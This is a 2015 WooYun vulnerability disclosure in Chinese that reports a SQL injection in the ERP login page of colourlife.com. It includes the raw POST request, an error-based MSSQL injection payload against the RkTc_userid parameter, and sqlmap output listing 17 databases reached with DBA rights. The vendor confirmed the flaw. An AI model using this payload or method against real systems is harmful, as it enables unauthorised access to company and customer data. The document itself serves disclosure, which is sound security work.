当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154444

漏洞标题:彩生活某处SQL注入(17库 DBA权限)

相关厂商:colourlife.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-11-21 16:18

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-21: 细节已通知厂商并且等待厂商处理中
2015-11-21: 厂商已经确认,细节仅向厂商公开
2015-12-01: 细节向核心白帽子及相关领域专家公开
2015-12-11: 细节向普通白帽子公开
2015-12-21: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

2333

详细说明:

post数据包:

POST /default.aspx HTTP/1.1
Host: erp.colourlife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://erp.colourlife.com/default.aspx
Cookie: WebsiteSession=34vhouchcoh77ce9masmq6ohg1; customer_user_agent=74896920; ASP.NET_SessionId=vhqgba55hs4te155t1h3hyra
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
RkTc_userid=admin*&RkTc_userpassword=admin&RkTc_FormEvents_ActionMode=&RkTc_FormEvents_ActionCmd=Login&RkTc_FormEvents_ActionTag=Login&RkTc_FormEvents_ActionSrcTag=&RkTc_FormEvents_ActionNextTag=Logout&RkTc_FormEvents_ActionNextMode=


参数 RkTc_userid 可注入

0.png


1.png


2.png


3.png


时间太晚了 要睡觉了 这里就不深入了

漏洞证明:

sqlmap identified the following injection point(s) with a total of 54 HTTP(s) re
quests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: RkTc_userid=admin' AND 9569=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)
+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9569=9569) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND 'wPdu'='
wPdu&RkTc_userpassword=admin&RkTc_FormEvents_ActionMode=&RkTc_FormEvents_ActionC
md=Login&RkTc_FormEvents_ActionTag=Login&RkTc_FormEvents_ActionSrcTag=&RkTc_Form
Events_ActionNextTag=Logout&RkTc_FormEvents_ActionNextMode=
---
[00:36:24] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[00:36:24] [INFO] testing Microsoft SQL Server
[00:36:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:33] [INFO] confirming Microsoft SQL Server
[00:36:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[00:36:50] [INFO] fetching database names
[00:36:53] [INFO] the SQL query used returns 17 entries
[00:36:54] [INFO] retrieved: ColourLifeData
[00:36:55] [INFO] retrieved: ColourLifeHR
[00:36:57] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:36:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:37:01] [INFO] retrieved: ColourlifeIntegral
[00:37:03] [INFO] retrieved: ColourLifeMain
[00:37:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:37:08] [INFO] retrieved: ColourLifeMobile
[00:37:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:37:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:37:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:37:17] [INFO] retrieved: ColourLifeShare
[00:37:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[00:37:21] [INFO] retrieved: distribution
[00:37:22] [INFO] retrieved: E_Clean
[00:37:24] [INFO] retrieved: E_Maintenance
[00:37:25] [INFO] retrieved: E_Partner
[00:37:26] [INFO] retrieved: hynoadb
[00:37:27] [INFO] retrieved: master
[00:37:27] [INFO] retrieved: model
[00:37:28] [INFO] retrieved: msdb
[00:37:29] [INFO] retrieved: ReportServer$COLOURLIFEDB
[00:37:29] [INFO] retrieved: ReportServer$COLOURLIFEDBTempDB
[00:37:30] [INFO] retrieved: tempdb
available databases [17]:
[*] ColourLifeData
[*] ColourLifeHR
[*] ColourlifeIntegral
[*] ColourLifeMain
[*] ColourLifeMobile
[*] ColourLifeShare
[*] distribution
[*] E_Clean
[*] E_Maintenance
[*] E_Partner
[*] hynoadb
[*] master
[*] model
[*] msdb
[*] ReportServer$COLOURLIFEDB
[*] ReportServer$COLOURLIFEDBTempDB
[*] tempdb
[00:37:30] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\erp.colourlife.com'
[*] shutting down at 00:37:30

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-21 16:46

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评价